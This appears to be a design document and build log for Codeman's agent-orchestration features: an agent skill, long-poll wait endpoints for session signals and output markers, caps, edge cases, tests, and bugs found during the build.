| send prompt and wait | `POST /api/v1/sessions/:id/input {input:"…\r", wait:"stop", waitTimeout:600000}` (Part 2) |
|
||||
| wait for a worker | `GET /api/v1/sessions/:id/wait?until=stop,blocked&timeout=300000` (Part 2) |
|
||||
| wait for a marker | `GET /api/v1/sessions/:id/wait-output?match=DONE_<random>&timeout=120000` (Part 2; unique per call, per §3.3's repaint rule) |
|
||||
| read output | `GET /api/v1/sessions/:id/output` |
|
||||
| read full scrollback | `GET /api/v1/sessions/:id/terminal?full=1` |
|
||||
| watch sub-agents | `GET /api/v1/subagents` |
|
||||
| schedule work | `POST /api/v1/cron/jobs` |
|
||||
| clean up | `DELETE /api/v1/sessions/:id` |
|
||||
|
||||
**5. Pointer to `reference/endpoints.md`** for anything not in the table, so the always-loaded
|
||||
part of the skill stays small.
|
||||
|
||||
### 2.4 An ergonomics guard worth adding server-side
|
||||
|
||||
The skill will tell the agent not to act on itself, but a confused agent can still try. Propose:
|
||||
the skill sends `X-Codeman-Caller-Session: $CODEMAN_SESSION_ID` on every request, and the server
|
||||
refuses destructive operations (`DELETE /api/sessions/:id`, kill, respawn stop) when that header
|
||||
equals the target id, with a clear error.
|
||||
|
||||
This is a **footgun guard, not a security control**: any caller can omit the header. Document it
|
||||
as such so nobody mistakes it for a boundary. It costs about 10 lines in `route-helpers.ts`.
|
||||
|
||||
### 2.5 Verification
|
||||
|
||||
Per the always-end-to-end-test rule, "the skill exists" is not done. Done is:
|
||||
|
||||
1. Symlink it into `.claude/skills/`, start a real throwaway Codeman session, and ask that agent
|
||||
to "start a worker session that runs the test suite and tell me when it finishes".
|
||||
2. Confirm from the outside that exactly one new session appeared, got the prompt, and that the
|
||||
lead agent waited rather than polling in a busy loop.
|
||||
3. Confirm the guard: run the same prompt in a shell with `CODEMAN_MUX` unset and confirm refusal.
|
||||
4. Confirm cleanup: the worker session is deleted by exact id and no other session was touched.
|
||||
|
||||
Never run this against `w1`/`w2`/`w3`.
|
||||
|
||||
### 2.6 Files touched
|
||||
|
||||
- `skills/codeman/SKILL.md` (new), `skills/codeman/reference/*.md` (new)
|
||||
- `.claude/skills/codeman` symlink (new)
|
||||
- `src/cli.ts` (new `skill install` subcommand)
|
||||
- `src/hooks-config.ts` (new `applyAgentSkill(casePath, enabled)`, mirroring `applyStatusLineConfig`)
|
||||
- `src/web/schemas.ts` (`agentSkillEnabled` in `SettingsUpdateSchema`, which is `.strict()`)
|
||||
- `src/web/routes/system-routes.ts` (settings PUT must resolve the flag from `merged`, never
|
||||
from the raw body, per the partial-PUT invariant)
|
||||
- `src/web/public/settings-ui.js` + `index.html` (checkbox)
|
||||
- `package.json` `files` array, so `skills/` ships to npm
|
||||
- README pointer, `docs/extending-codeman.md` seam 3 pointer
|
||||
|
||||
---
|
||||
|
||||
## 3. Part 2: wait primitives
|
||||
|
||||
### 3.1 Goal
|
||||
|
||||
Make Codeman orchestratable from a shell tool. Today the only "tell me when" channel is SSE,
|
||||
which a curl-driven agent cannot practically consume: it would have to hold a streaming
|
||||
connection and parse events inline. herdr solves this with blocking CLI calls. Codeman should
|
||||
solve it with bounded long-poll endpoints.
|
||||
|
||||
All three additions are **additive**, so the versioning policy stays intact (new endpoints and
|
||||
new optional fields are non-breaking).
|
||||
|
||||
### 3.2 The signal model
|
||||
|
||||
A waiter resolves on the first of a set of signals. Sources that already exist:
|
||||
|
||||
| Signal | Source today |
|
||||
| --------- | --------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| `idle` | `Session` emits `idle` (session.ts ~1775 for Claude, ~2101 for shell), wired at `session-listener-wiring.ts:402` |
|
||||
| `working` | `Session` emits `working` (session.ts ~1788), wired at `session-listener-wiring.ts:401` |
|
||||
| `stop` | `POST /api/hook-event` with `event: 'stop'`, the definitive "Claude finished responding" signal already used by `controller.signalStopHook()` |
|
||||
| `blocked` | `POST /api/hook-event` with `permission_prompt` or `elicitation_dialog` |
|
||||
| `exit` | `Session` emits `exit` |
|
||||
|
||||
`stop` is the highest-quality signal for "the turn is over" and should be the documented default
|
||||
for orchestration. `idle` is heuristic: output stabilization plus prompt detection, and it can
|
||||
flap mid-turn when a spinner pauses. External CLI modes (`isExternalCliMode()`) have no stop
|
||||
hook at all, so for opencode/codex/gemini/antigravity only `idle`, `working` and `exit` are
|
||||
available. **The skill and the docs must say which signals exist per mode**, otherwise an agent
|
||||
waits forever on `stop` in a codex session.
|
||||
|
||||
### 3.3 Endpoint specs
|
||||
|
||||
#### A. `GET /api/sessions/:id/wait`
|
||||
|
||||
| Param | Type | Default | Notes |
|
||||
| --------- | ---------------------------------------------- | ---------------- | ------------------------------------------------------------ |
|
||||
| `until` | comma list of `idle,working,stop,blocked,exit` | `stop,idle,exit` | resolves on first match |
|
||||
| `timeout` | ms | 60000 | clamped to `MAX_WAIT_MS` (600000) |
|
||||
| `fresh` | `0`/`1` | `0` | `1` requires a _transition_, ignoring the state at call time |
|
||||
|
||||
Response (always 200 unless the session is missing or a cap is hit):
|
||||
|
||||
```json
|
||||
{
|
||||
"success": true,
|
||||
"data": {
|
||||
"signal": "stop",
|
||||
"timedOut": false,
|
||||
"immediate": false,
|
||||
"ended": false,
|
||||
"waitedMs": 8421,
|
||||
"status": "idle",
|
||||
"sessionId": "...",
|
||||
"until": ["stop", "idle", "exit"],
|
||||
"limitPaused": false
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
`until` is echoed back because the server may narrow it: `stop`/`blocked` are dropped
|
||||
from the DEFAULT set for external CLI modes (asking for them EXPLICITLY is a 400
|
||||
instead, since omitting `until` must never 400). `limitPaused` tells a caller that a
|
||||
timeout was expected rather than a stall worth retrying hard.
|
||||
|
||||
**A timeout is not an error.** `{"timedOut": true, "signal": null}` with HTTP 200, so a caller
|
||||
can loop without treating every poll boundary as a failure. Errors are reserved for
|
||||
`NOT_FOUND` (unknown or not-owned session) and `SESSION_BUSY` (waiter cap exceeded).
|
||||
|
||||
`immediate: true` means the session was already in the requested state and `fresh` was not set.
|
||||
|
||||
#### B. `GET /api/sessions/:id/wait-output`
|
||||
|
||||
| Param | Type | Default | Notes |
|
||||
| --------- | ------------------------------ | -------- | --------------------------------------------------------- |
|
||||
| `match` | literal string, 1 to 200 chars | required | substring match against ANSI-stripped output |
|
||||
| `nocase` | `0`/`1` | `0` | case-insensitive compare |
|
||||
| `from` | `now` \| `buffer` | `now` | `buffer` scans the existing text buffer first, then waits |
|
||||
| `timeout` | ms | 60000 | clamped to `MAX_WAIT_MS` |
|
||||
|
||||
Response: `{ matched: true, timedOut: false, snippet: "...", waitedMs }`.
|
||||
|
||||
**No regex in v1, deliberately.** `search-service.ts` already avoids regex specifically so there
|
||||
is no ReDoS surface, and this endpoint would be even more exposed since the pattern is attacker
|
||||
supplied and the input is a live stream. herdr can offer `--regex` because Rust's regex crate is
|
||||
linear-time with no backtracking; JS `RegExp` is not. If regex is wanted later, the honest
|
||||
options are a length-capped subset compiled once with a match budget, or `re2`. Note it and move on.
|
||||
|
||||
Implementation detail that will bite if missed: a match can straddle two PTY chunks. Keep a
|
||||
carry buffer of `match.length - 1` bytes from the previous chunk and test `carry + chunk`.
|
||||
|
||||
⚠️ **`from=now` does not mean "printed after you asked".** tmux repaints the visible
|
||||
screen on attach, resize, or any TUI redraw, and a repaint arrives as ordinary `terminal`
|
||||
data. Observed live: a marker echoed a minute earlier matched instantly on a fresh
|
||||
`from=now` wait. This is inherent to a terminal multiplexer, not fixable in the registry,
|
||||
so the contract is: **use a marker unique per call** (`echo DONE_$RANDOM`), never a
|
||||
generic one like `BUILD OK`. The skill's recipes must show that.
|
||||
|
||||
The returned snippet is whitespace-collapsed (blank runs to a single newline) for
|
||||
readability only; matching runs on the raw stripped text. Without it, a real pane's
|
||||
`\r\n` padding between the prompt and the match fills the whole context window with
|
||||
nothing, which was the first thing the live test showed.
|
||||
|
||||
#### C. `wait` on the existing input endpoint
|
||||
|
||||
`POST /api/sessions/:id/input` gains two optional fields:
|
||||
|
||||
```json
|
||||
{ "input": "run the tests\r", "useMux": true, "clientId": "agent-1", "seq": 7, "wait": "stop", "waitTimeout": 600000 }
|
||||
```
|
||||
|
||||
(The trailing `\r` is required on every input body: `sendInput` sends Enter only
|
||||
when the input contains a carriage return.)
|
||||
|
||||
Response gains `"wait": { "signal": "stop", "timedOut": false, "waitedMs": 41230 }`.
|
||||
|
||||
This is the important one, because it closes a race the standalone `GET .../wait` cannot: between
|
||||
"input delivered" and "session flips to working" there is a window where a naive
|
||||
send-then-wait sees the _pre-existing_ idle state and returns instantly. The combined endpoint
|
||||
**registers the waiter before writing**, so that window does not exist. This is exactly why herdr
|
||||
ships `agent prompt --wait` as its own thing.
|
||||
|
||||
`wait` accepts `true` (the default signal set) or the same comma grammar as `until`.
|
||||
Both new fields are `.nullish()`, not `.optional()`: a third-party caller building the
|
||||
body with `JSON.stringify` keeps an explicit `null` on the wire, and `.optional()`
|
||||
rejects that with `INVALID_INPUT`. That gotcha has shipped as a real bug twice.
|
||||
|
||||
Two behaviors to preserve carefully:
|
||||
|
||||
- **`useMux` is fire-and-forget today.** The handler responds without awaiting `writeViaMux`, on
|
||||
purpose (a tmux child process must not block the HTTP response). With `wait` present the
|
||||
handler already has to stay open, so it can await delivery, and a `writeViaMux` failure becomes
|
||||
observable for the first time. The non-wait path must keep its current fire-and-forget shape
|
||||
byte for byte.
|
||||
- **Duplicate suppression.** A tagged redelivery (`clientId`+`seq` already applied) returns 200
|
||||
without writing. With `wait` set it still waits, since the caller's intent is "tell me when
|
||||
this settles". But it waits with `requireTransition: false`, unlike a fresh delivery: the
|
||||
original turn may be long over, and requiring a new transition would block a redelivery until
|
||||
timeout for no reason. Fresh delivery requires a transition, a duplicate answers from the
|
||||
current state.
|
||||
- **Capacity rollback.** `shouldApplyInput()` MUTATES (it records the seq), and it runs before
|
||||
the waiter is registered. If registration then fails on a full pool, the handler must call
|
||||
`forgetInputSeq` before returning `SESSION_BUSY`, or the caller's retry is rejected as a
|
||||
duplicate and the input is lost by the very mechanism reliable delivery exists for.
|
||||
|
||||
### 3.4 Module design
|
||||
|
||||
New file `src/web/session-wait-registry.ts`, with the IO-free core unit-testable in isolation
|
||||
(same split as `self-update.ts`):
|
||||
|
||||
```ts
|
||||
type WaitSignal = 'idle' | 'working' | 'stop' | 'blocked' | 'exit';
|
||||
|
||||
waitForSignal(sessionId, { until: Set<WaitSignal>, timeoutMs, requireTransition }): Promise<WaitResult>
|
||||
notifySignal(sessionId, signal: WaitSignal): void
|
||||
waitForOutput(sessionId, { match, nocase, timeoutMs }): Promise<OutputWaitResult>
|
||||
notifyOutput(sessionId, chunk: string): void
|
||||
cancelAll(sessionId, reason): void
|
||||
```
|
||||
|
||||
Wiring points, all existing:
|
||||
|
||||
- `src/web/session-listener-wiring.ts` around lines 190 and 200 already handles `working` and
|
||||
`idle` and broadcasts them. Add a `notifySignal()` call next to each broadcast, plus `exit`.
|
||||
- `src/web/routes/hook-event-routes.ts` already switches on `event` for the respawn controller.
|
||||
Add `notifySignal(sessionId, 'stop' | 'blocked')` in the same switch.
|
||||
- Output: `notifyOutput()` rides the ALREADY-attached `terminal` listener in
|
||||
session-listener-wiring.ts. An earlier draft had the registry hand out attach/detach
|
||||
callbacks so a listener could be added lazily; that was deleted once it was clear no
|
||||
second listener is needed at all. The cost is one Map lookup per PTY chunk, which is why
|
||||
the no-waiter check comes before the ANSI strip.
|
||||
- Session deletion calls `notifySignal('exit')` then `cancelAll()`, so no promise is left
|
||||
hanging. Both are required: `_doCleanupSession` detaches the session's listeners BEFORE
|
||||
`session.stop()`, so on a delete the PTY exit event never reaches the registry, and an
|
||||
`until=exit` caller would otherwise get a bare `ended` instead of its signal. Found by
|
||||
live-testing the delete path, not by the unit tests.
|
||||
|
||||
Memory-leak discipline, per the 24-hour-session rules: every waiter owns a timer that is cleared
|
||||
on resolve, the per-session waiter set is deleted when it empties, and the output listener is
|
||||
removed with it. `test/memory-leak-prevention.test.ts` should grow a case for this.
|
||||
|
||||
Caps in a new `src/config/agent-wait.ts` (limits live in `src/config/`, env-overridable):
|
||||
|
||||
| Constant | Default | Why |
|
||||
| ------------------------- | ------- | --------------------------------------- |
|
||||
| `MAX_WAIT_MS` | 600000 | an unbounded long-poll is a socket leak |
|
||||
| `DEFAULT_WAIT_MS` | 60000 | short enough to survive most proxies |
|
||||
| `MAX_WAITERS_PER_SESSION` | 16 | |
|
||||
| `MAX_WAITERS_TOTAL` | 128 | same reasoning as `MAX_SSE_CLIENTS` |
|
||||
|
||||
Exceeding a cap returns `SESSION_BUSY`, not a silent queue.
|
||||
|
||||
### 3.5 Transport concerns
|
||||
|
||||
Fastify is constructed with defaults in `server.ts:329-331`. `requestTimeout` defaults to 0
|
||||
(disabled) and `keepAliveTimeout` (72s) applies between requests, not to an in-flight one, so a
|
||||
10-minute in-process hold is fine. **Verify this on the real instance before relying on it.**
|
||||
|
||||
Intermediaries are the actual risk. Prod is reached through `tailscale serve`, and users also run
|
||||
cloudflared tunnels; both can cut an idle connection. That is why `DEFAULT_WAIT_MS` is 60s and
|
||||
why the documented pattern is a client-side loop over short waits rather than one 10-minute call.
|
||||
The skill's recipes must show the loop.
|
||||
|
||||
### 3.6 Edge cases to get right
|
||||
|
||||
| Case | Behavior |
|
||||
| ------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Session already idle, `fresh=0` | return immediately, `immediate: true` |
|
||||
| Session already idle, `fresh=1` | wait for the next transition into a requested state |
|
||||
| Session dies mid-wait | resolve with `signal: "exit"` if `exit` was requested, otherwise resolve `timedOut:false, signal:null, ended:true`. Never hang |
|
||||
| Session deleted mid-wait | same, resolve, do not throw. Verified live: `until=exit` gets `signal:"exit"`, a concurrent `until=blocked` gets `ended:true`, both in ~0ms |
|
||||
| Shutdown with a wait pending | `cancelEverything()` in `stop()`. Verified live: SIGTERM with a 300s wait in flight exits in 1s |
|
||||
| External CLI mode | `stop` and `blocked` never fire. Reject `until=stop` for those modes with a clear `INVALID_INPUT` rather than hanging until timeout |
|
||||
| Multi-user | goes through `findSessionOrFail(ctx, id, req)`, which already enforces ownership |
|
||||
| Remote / Docker cases | signals originate from the same `Session` object, so no special casing. Docker hooks need `CODEMAN_DOCKER_BRIDGE_HOOKS=1` for `stop`/`blocked` to arrive at all; without it, only `idle` works. Document it |
|
||||
| Respawn `/clear` mid-wait | a respawn cycle emits `idle`. Callers waiting on `stop` are unaffected; callers on `idle` may resolve early. Documented, not fixed |
|
||||
| Limit pause | if the session is paused on a usage limit, nothing will fire until the reset. The wait times out honestly. Consider surfacing `limitPaused: true` in the response so the caller can back off |
|
||||
|
||||
### 3.7 Tests
|
||||
|
||||
- `test/session-wait-registry.test.ts` (pure): immediate resolve, transition-required, multi-signal
|
||||
first-wins, timeout, cap exceeded, cancel on session end, no listener leak after resolve,
|
||||
chunk-straddling output match, case-insensitive match.
|
||||
- `test/routes/session-wait-routes.test.ts` (`app.inject()`, no port): all three endpoints against
|
||||
a `MockSession`, including the 200-with-`timedOut` contract and the ownership 404.
|
||||
- `test/routes/session-input-wait.test.ts`: the send-and-wait race, plus proof that the non-wait
|
||||
path is unchanged (still returns before `writeViaMux` settles).
|
||||
- Live verification on a throwaway session before COM, per the always-end-to-end-test rule.
|
||||
|
||||
### 3.8 Files touched
|
||||
|
||||
- `src/config/agent-wait.ts` (new)
|
||||
- `src/web/session-wait-registry.ts` (new)
|
||||
- `src/web/session-listener-wiring.ts` (notify on idle/working/exit)
|
||||
- `src/web/routes/hook-event-routes.ts` (notify on stop/blocked)
|
||||
- `src/web/routes/session-routes.ts` (two new routes, `wait` fields on input)
|
||||
- `src/web/schemas.ts` (`SessionWaitQuerySchema`, `SessionWaitOutputQuerySchema`, extend
|
||||
`SessionInputWithLimitSchema`. Note: `.optional()` rejects `null`, so the frontend and any
|
||||
generated client must send `undefined`, never `null`)
|
||||
- `docs/api-reference.md`, `docs/extending-codeman.md`, README API table
|
||||
- `skills/codeman/SKILL.md` recipes (Part 1 depends on this)
|
||||
|
||||
---
|
||||
|
||||
## 4. Deferred: parts 3 to 5
|
||||
|
||||
Not in scope now, kept here so they are not lost.
|
||||
|
||||
### Part 3: promote `blocked` to a first-class state
|
||||
|
||||
`SessionStatus` is `'idle' | 'busy' | 'stopped' | 'error'`. "Needs you" exists three times over:
|
||||
hook events, the `tab-alert-action` CSS class, and the phone overview NEEDS YOU section, each
|
||||
re-deriving it. herdr makes `blocked` a real state that rolls up.
|
||||
|
||||
Add `blocked` (and possibly `done`) to `SessionStatus`, set it from the same hook events that
|
||||
Part 2 uses as wait signals, and clear it on the next `working`/`stop`. Then the tab strip, the
|
||||
mobile overview, the wait endpoints, and any external agent read one field.
|
||||
|
||||
Cost: `SessionStatus` is a widely-consumed union, so every exhaustive `switch` (the codebase has
|
||||
`assertNever` and `noFallthroughCasesInSwitch`) will need a branch. That is a feature, it makes
|
||||
the compiler find every site. This is a **minor** bump, not a patch: it widens a public type in
|
||||
the HTTP contract.
|
||||
|
||||
### Part 4: `GET /api/schema`
|
||||
|
||||
herdr ships `herdr api schema`. Every Codeman route is already Zod-validated, so
|
||||
`zod-to-json-schema` over `schemas.ts` gives a self-describing API almost free. Value: third-party
|
||||
tools and the skill stop drifting from hand-written docs. Open question: whether to emit full
|
||||
OpenAPI (`@fastify/swagger` would need per-route schema registration, which is a much larger
|
||||
change) or just dump the Zod schemas keyed by name (cheap, 80% of the value).
|
||||
|
||||
### Part 5: detection manifests instead of hardcoded patterns
|
||||
|
||||
CLI-specific readiness, blocked and usage-limit patterns live in code across
|
||||
`usage-limit-patterns.ts`, the respawn pattern helpers and `regex-patterns.ts`. Externalizing the
|
||||
per-CLI ones into data files would make adding a sixth CLI a data change instead of a code change.
|
||||
|
||||
**Do not copy the remote-update part.** herdr auto-fetches manifest updates from herdr.dev.
|
||||
Codeman auto-pulling behavioral rules from a vendor server contradicts its security posture.
|
||||
Bundled manifests plus local override only, no network.
|
||||
|
||||
### Explicit non-goals
|
||||
|
||||
- **Plugin runtime and marketplace.** `docs/extending-codeman.md` already argues this: a plugin
|
||||
runtime means third-party code inside a process that spawns agents with your credentials, on a
|
||||
server people expose over a tunnel. The reasoning still holds. If the marketplace _pattern_ is
|
||||
wanted, apply it to data (web tabs, case templates, cron recipes), never to executable code.
|
||||
- **Live PTY handoff on restart.** herdr needs it because it owns the terminals. Codeman
|
||||
delegates to tmux, so PTYs already survive a self-update restart.
|
||||
- **Socket API.** HTTP plus SSE is the existing, documented, stable contract. A second transport
|
||||
would double the surface for no capability gain.
|
||||
|
||||
---
|
||||
|
||||
## 5. Sequencing
|
||||
|
||||
| Step | Work | Gate |
|
||||
| ---- | ------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| 1 ✅ | `src/config/agent-wait.ts` + `session-wait-registry.ts` + unit tests | 48 tests green |
|
||||
| 2 ✅ | `GET .../wait` + wiring in listener-wiring, hook-event-routes, server teardown | 15 route tests green; live-verified on an isolated `CODEMAN_INSTANCE=waittest` instance (immediate resolve, 400 on a bad signal, 200+`timedOut` on timeout, hook `stop` and `permission_prompt`→`blocked` waking an in-flight wait, delete delivering `exit`, SIGTERM not blocked); full `test:ci` sweep green |
|
||||
| 3 ✅ | `GET .../wait-output` | 16 route tests green; live-verified on real PTY bytes (`echo MARKER` waking a blocked request in ~1s, `from=buffer` immediate hit, never-seen marker timing out at exactly 2001ms, nocase, `regex` refused with a 400); full `test:ci` sweep green |
|
||||
| 4 ✅ | `wait` field on `POST .../input`, non-wait path proven unchanged | 16 route tests green; live-verified (no-wait returns in 26ms with the historical bare body; an idle session did NOT satisfy a `wait` request, blocking the full 2001ms, which is the race the endpoint exists to close; the stop hook resolved a send-and-wait at 1510ms and the input was confirmed in the tmux pane; `wait:null` accepted) |
|
||||
| 5 ✅ | `skills/codeman/SKILL.md` + reference files + `.claude/skills` symlink | live dogfood: a real session orchestrates a worker end to end |
|
||||
| 6 ✅ | `codeman skill install` CLI + `applyAgentSkill()` + `agentSkillEnabled` setting | 10 unit tests (`test/agent-skill.test.ts`) + real-server case-creation tests (`test/quick-start.test.ts`, incl. the settings PUT accepting the key) green; CLI verified live (install/uninstall, global + `--case`, foreign/symlink refusals) |
|
||||
| 7 ✅ | Docs: api-reference, extending-codeman, README | plus `architecture-invariants.md` (§agent-wait-primitives), `CLAUDE.md` and the API reference's per-mode signal table |
|
||||
| 8 ✅ | COM (minor bump: new endpoints, new setting, new optional fields) | released as 1.13.0 (wait primitives + skill); step 6 followed in 1.14.1 and was republished as 1.14.2 after live-testing the packaged skill |
|
||||
|
||||
Parts 1 and 2 are independent enough to land separately, but the skill is much less useful
|
||||
without the wait endpoints, so the wait work goes first.
|
||||
|
||||
## 6. Open questions for the owner
|
||||
|
||||
1. ✅ `skills/` at the repo root: accepted (built that way; the install one-liner depends on it).
|
||||
2. ✅ `agentSkillEnabled` default: **OFF** for the first release, per §2.2's rationale (skills
|
||||
cost context on every turn; measure before defaulting on). Flip later if dogfooding earns it.
|
||||
3. ✅ Both: global install via `npx skills add` / `codeman skill install`, AND per-case
|
||||
auto-injection behind the (default-off) setting. Injection is add-only at session create and
|
||||
marker-guarded, so a user-authored copy is never touched.
|
||||
4. Is `X-Codeman-Caller-Session` self-protection worth the 10 lines, given it is a footgun guard
|
||||
and not a security boundary? (Still open, not built with step 6.)
|
||||
5. ✅ Regex support in `wait-output`: literal-only shipped, and a `regex` query param is
|
||||
rejected with a 400 rather than ignored, so an agent that assumed otherwise cannot
|
||||
silently wait on the wrong thing.
|
||||
|
||||
---
|
||||
|
||||
## 7. Build log: what actually happened
|
||||
|
||||
Written at the end of the build so the next person inherits the reasoning, not just the
|
||||
diff. Process artifacts (per-agent briefs, findings, reports) live in the gitignored
|
||||
`tmp/agent-wait-review/`; this section is the part worth keeping.
|
||||
|
||||
### What shipped
|
||||
|
||||
| Piece | Files |
|
||||
| ------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Bounds + clamping | `src/config/agent-wait.ts` (new) |
|
||||
| Blocking-wait registry | `src/web/session-wait-registry.ts` (new, IO-free, unit-tested) |
|
||||
| `GET .../wait`, `GET .../wait-output`, `wait`/`waitTimeout` on `POST .../input` | `src/web/routes/session-routes.ts` |
|
||||
| Signal wiring | `session-listener-wiring.ts` (idle/working/exit + output), `hook-event-routes.ts` (stop/blocked), `server.ts` (teardown, shutdown) |
|
||||
| Agent skill | `skills/codeman/SKILL.md` + `reference/`, `.claude/skills/codeman` symlink, `package.json` `files` |
|
||||
| Docs | `api-reference.md`, `extending-codeman.md`, `architecture-invariants.md`, `README.md`, `CLAUDE.md` |
|
||||
| Tests | `test/session-wait-registry.test.ts`, three `test/routes/session-*wait*.test.ts`, `http-contract.test.ts`, `mock-session.ts` |
|
||||
|
||||
### Bugs found in ADJACENT code, not in the new feature
|
||||
|
||||
These are the highest-value output of the exercise and none were on the plan:
|
||||
|
||||
1. **Every Codeman hook was dead on HTTPS installs.** `hooks-config.ts` built the hook
|
||||
curl as `curl -s` with no `-k` while the statusline exporter 300 lines below used
|
||||
`curl -sk` and documented why. Proven with the real hook command: `curl exit=60`
|
||||
without the flag, success with it, and the failure swallowed by the hook's own
|
||||
`2>/dev/null || true`. This silently killed `stop`, `permission_prompt`,
|
||||
`elicitation_dialog`, `idle_prompt`, `teammate_idle` and `task_completed`, taking
|
||||
respawn's definitive idle signals with them. Fixed, **plus** a staleness detector in
|
||||
`refreshStaleCodemanHooks` that regenerates the on-disk config of already-created
|
||||
cases (23 of 26 local cases carried the broken form; fixing the generator alone would
|
||||
have left every one of them broken).
|
||||
2. **`buildEnvExports()` exported a wrong-scheme `CODEMAN_API_URL`** (`http://` fallback
|
||||
on an HTTPS install). Now omitted rather than guessed, so in-session guards fail closed.
|
||||
3. **Programmatic input is only submitted when it contains `\r`.** `sendInput` sends Enter
|
||||
only if the payload has a carriage return; without it the text sits in the composer
|
||||
forever. Bit this build repeatedly before it was diagnosed, and had leaked into the
|
||||
docs' own examples.
|
||||
|
||||
### Design decisions worth not re-litigating
|
||||
|
||||
- **A timeout is HTTP 200** with `wait.timedOut`, never a 4xx: callers loop over short
|
||||
waits because tunnels cut idle connections, and every poll boundary would otherwise be
|
||||
indistinguishable from failure.
|
||||
- **Send-and-wait must be one endpoint.** A separate POST-then-wait races: between the
|
||||
write and the flip to `working`, a wait sees the stale `idle` and reports the PREVIOUS
|
||||
turn as this one. The waiter is registered before the write.
|
||||
- **`stop`/`blocked` exist for `claude` mode only.** They come from Claude Code hooks;
|
||||
`shell` installs none either, so keying off `isExternalCliMode()` was wrong.
|
||||
- **Literal matching only, never regex.** JS `RegExp` backtracks; herdr can offer
|
||||
`--regex` because Rust's regex crate is linear-time.
|
||||
- **Client-hangup abort listens on `reply.raw` guarded by `writableFinished`.** On
|
||||
`req.raw`, `close` fires when the request BODY ends, which on a POST killed every
|
||||
send-and-wait instantly, and no `app.inject()` test can see it (inject never emits
|
||||
`close`).
|
||||
- **Liveness cannot come from `session.pid`.** For a tmux session that is the local
|
||||
`tmux attach` client, not the worker: a worker exiting inside its pane leaves
|
||||
`pane_dead=1` with the client alive, so `pid` never goes null. Liveness is probed at
|
||||
the mux layer, cached (~750 ms) and only on blocking waits, never on the input hot path.
|
||||
|
||||
### Verification rounds
|
||||
|
||||
Six agents across three rounds, each verifying the previous round's work rather than its
|
||||
own. Findings that mattered, in order of severity, were: the dead-pane liveness gap; the
|
||||
`reply.raw` abort regression; abandoned long-polls leaking waiter slots; a crashed session
|
||||
reporting `idle`; `shell` accepting `until=stop`; and a documented recipe that reported
|
||||
success without running its task. Two traps recurred often enough to name:
|
||||
|
||||
- **Vacuous passes.** `app.inject()` never emits `close`; a latched `cancelEverything()`
|
||||
in `afterEach` silently killed the registry for every later test in a file; three test
|
||||
files sharing one session id against the process-wide registry let one file's leftover
|
||||
waiter fail another's assertion. Any new wait test needs care on all three.
|
||||
- **HTTP-only test instances.** Every isolated instance used during the build was plain
|
||||
HTTP, which is exactly why the HTTPS hook bug survived so long. Test the transport the
|
||||
user actually runs.
|
||||
|
||||
### Resolved at wrap-up (2026-08-08, conclusion pass)
|
||||
|
||||
- **R2-A**: the fire-and-forget-then-gather-sequentially pattern was **removed from
|
||||
the skill** rather than patched. Signals are edge-triggered with no history, so a
|
||||
`stop` that fires before its waiter registers is unobservable afterwards; a
|
||||
`fresh=0` gather was rejected because the only `until` set that current state can
|
||||
satisfy answers `idle` for a prompt that never submitted, resurrecting the exact
|
||||
false-success failure R2-B had just closed. Flow 3b's pattern B now gathers on
|
||||
latched `wait-output` markers (`from=buffer`), the same mechanism that makes the
|
||||
shell flows reliable; the limitation is recorded in
|
||||
`architecture-invariants#agent-wait-primitives` and `endpoints.md`. The durable
|
||||
fix, a latched last-signal-per-turn on the server, stays with deferred Part 3.
|
||||
- Docs F7/F8, F4 and the false-`idle` attribution: `api-reference.md`,
|
||||
`extending-codeman.md` and `architecture-invariants.md` rewritten to the post-fix
|
||||
matcher (one normalized stream, chunk-straddling found, snippet as a rendering of
|
||||
the matched window), the real no-PTY answer (`ended:true`, `aborted:false`,
|
||||
`delivered:false`), and the startup-idle mechanism (a session parked on the trust
|
||||
dialog emits no further `idle`; the false success is the startup transition).
|
||||
- Orchestrate #12, #5/R2-B, #6, and R2-C..R2-E: fire-and-forget's empty `data`
|
||||
documented; every send-and-wait retry loop now treats `duplicate:true` +
|
||||
`immediate:true` as "no new turn ran" and reads the terminal before believing it;
|
||||
claude fan-out is pattern A (backgrounded send-and-waits) or the marker gather;
|
||||
readiness budgets rebalanced (5 s stage 1, 45 s stage 3) with the virgin-case
|
||||
floor named; the auth fallback now also reads the supervisor definition
|
||||
(`codeman-web.service` / launchd plist) and accepts `export`-prefixed `.env`
|
||||
lines; `pid != null` is documented as startup-only, never liveness.
|
||||
- Both public readiness recipes (extending-codeman.md, README) are bypass-first with
|
||||
the trust probe as the bounded fallback; the worked recipe carries `-k` and fails
|
||||
loudly on an empty SID; the hook `-k`/self-heal fix appears in every
|
||||
"hooks go missing" list; the multi-word-TUI claim is "unreliable", not "never".
|
||||
|
||||
### Still open
|
||||
|
||||
Both release-checklist items that used to sit here are done: `skills/` is tracked and
|
||||
ships through `package.json` `files` (published with 1.13.0, republished with 1.14.2),
|
||||
and the changeset was consumed, committed and deployed. What is left:
|
||||
|
||||
- Deferred with Part 3: the latched last-signal-per-turn. Nice-to-haves from the
|
||||
reviews: N2 (create the death-watcher inside its `try`, still built one line above
|
||||
it in `GET .../wait`) and converting timeout-shaped test detections into fast
|
||||
assertions.
|
||||
- §2.4's `X-Codeman-Caller-Session` footgun guard: still not built (open question 4).
|
||||
|
||||
### Step 6 (2026-08-09): install command, per-case injection, the setting
|
||||
|
||||
Built to the §2.6 file list, mirroring the statusLine mechanism throughout:
|
||||
|
||||
| Piece | Where |
|
||||
| ----- | ----- |
|
||||
| `applyAgentSkill(casePath, enabled)` + `installAgentSkillInto` / `removeAgentSkillFrom` | `src/hooks-config.ts` |
|
||||
| `codeman skill install` / `skill uninstall` (`--global` default, `--case <name>`) | `src/cli.ts` |
|
||||
| `agentSkillEnabled` (SYNCED, default OFF) | `schemas.ts` (`SettingsUpdateSchema`), `getAgentSkillEnabled()` on `ConfigPort`/`server.ts`, checkbox in `index.html` + `settings-ui.js` |
|
||||
| Injection call sites (Claude mode only) | `POST /api/sessions` next to `refreshStaleCodemanHooks`; `POST /api/quick-start` after the case-create/self-heal blocks (local + docker cases; remote skipped, its path lives on another host) |
|
||||
